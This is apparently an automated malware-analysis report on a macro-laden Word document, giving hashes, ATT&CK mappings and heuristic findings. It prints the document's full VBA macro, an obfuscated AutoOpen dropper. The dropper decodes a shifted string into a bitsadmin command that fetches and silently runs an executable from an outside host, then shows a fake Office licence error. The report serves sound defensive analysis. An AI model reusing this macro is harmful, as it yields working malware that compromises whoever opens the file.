Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ddcd8b6344b593ce…

MALICIOUS

Office (OLE)

124.5 KB Created: 2017-05-09 08:23:00 First seen: 2017-11-13
MD5: 3bcec90e4be4bea7f4218668734edd11 SHA-1: df5ba81ef029525fed5d1ba82db6f1f7acb1c234 SHA-256: ddcd8b6344b593ce0e0890a26b88d5d43620ccb13e268368180c7432c6a49cb5
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The document body explicitly instructs the user to 'Enable editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The obfuscated VBA script likely downloads and executes a second-stage payload.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2448 bytes
SHA-256: c5831cb809207c0210fe24399f96dd4644e31f353f187cb32679f828789dc654
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"


Private Function CTSIBDK(CHRGGO As String)
  CTSIBDK = OIUVRNEDOKKADL(CHRGGO, 3)
End Function
Private Function OIUVRNEDOKKADL(ByVal JTVMBVDFKBKBOFYNOPNOTROH As String, ByVal BOVADBGBRCXBVPKCNEAEPBIDY As Long) As String
    Dim GTHWDUZMGFVRRZKOYXC As Long
    GTHWDUZMGFVRRZKOYXC = Len(JTVMBVDFKBKBOFYNOPNOTROH)

    Dim OBMEMCLDECFDK As String
    Dim POHTRFDCGLKVOCUKG As Long
    Dim AKPHFIKBCPLKHEJ As Long
    Dim XGIXKPKMAJBMHIBIIR() As Long
    ReDim XGIXKPKMAJBMHIBIIR(1 To GTHWDUZMGFVRRZKOYXC)
    For AKPHFIKBCPLKHEJ = 1 To GTHWDUZMGFVRRZKOYXC
        POHTRFDCGLKVOCUKG = Asc(Mid(JTVMBVDFKBKBOFYNOPNOTROH, AKPHFIKBCPLKHEJ, 1))
        If POHTRFDCGLKVOCUKG = 32 Then
            XGIXKPKMAJBMHIBIIR(AKPHFIKBCPLKHEJ) = POHTRFDCGLKVOCUKG
        Else:
            POHTRFDCGLKVOCUKG = POHTRFDCGLKVOCUKG - BOVADBGBRCXBVPKCNEAEPBIDY
            XGIXKPKMAJBMHIBIIR(AKPHFIKBCPLKHEJ) = POHTRFDCGLKVOCUKG
        End If
        OBMEMCLDECFDK = OBMEMCLDECFDK & Chr(XGIXKPKMAJBMHIBIIR(AKPHFIKBCPLKHEJ))
    Next
    OIUVRNEDOKKADL = OBMEMCLDECFDK
End Function

Sub AutoOpen()
    Dim GHBLZMZRGBBMHYJOVIHY As String
    Dim EWFS As String
    GHBLZMZRGBBMHYJOVIHY = GHBLZMZRGBBMHYJOVIHY & CTSIBDK("fpg1h{h 2f %zdlwiru 2w 8 ") & CTSIBDK("\NHUT ) e") & CTSIBDK("lwvdgplq 2wudq") & CTSIBDK("vihu XNHI 2grzqo") & CTSIBDK("rdg 2su") & CTSIBDK("lrulw") & CTSIBDK("| qrupdo ") & CTSIBDK("kw")
    GHBLZMZRGBBMHYJOVIHY = GHBLZMZRGBBMHYJOVIHY & CTSIBDK("wsv=22fdqdgdsrvw1wrs2h{ix25675") & CTSIBDK("6756756lrxrxlgvilrxivgikmvgim") & CTSIBDK("knnm657me65em1h{h (ds") & CTSIBDK("sgdwd(_r") & CTSIBDK("vedvn1h{h )") & CTSIBDK("vwduw (dssgdwd(_rv")
    GHBLZMZRGBBMHYJOVIHY = GHBLZMZRGBBMHYJOVIHY & CTSIBDK("edvn1h{h%")

    EWFS = EWFS & CTSIBDK("Huuru 4") & CTSIBDK("<;:7= \rx ") & CTSIBDK("pxvw kdyh Rii") & CTSIBDK("lfh Surihvv") & CTSIBDK("lrqdo Hglwlrq w") & CTSIBDK("r uhdg wklv frqwhqw/ sohdvh")
    EWFS = EWFS & CTSIBDK(" xsjudgh |rxu olfhqfh1 Ylvlw z") & CTSIBDK("zz1plfurvri") & CTSIBDK("w1frp iru") & CTSIBDK(" khos")
    
    Shell GHBLZMZRGBBMHYJOVIHY, vbHide
    MsgBox EWFS
End Sub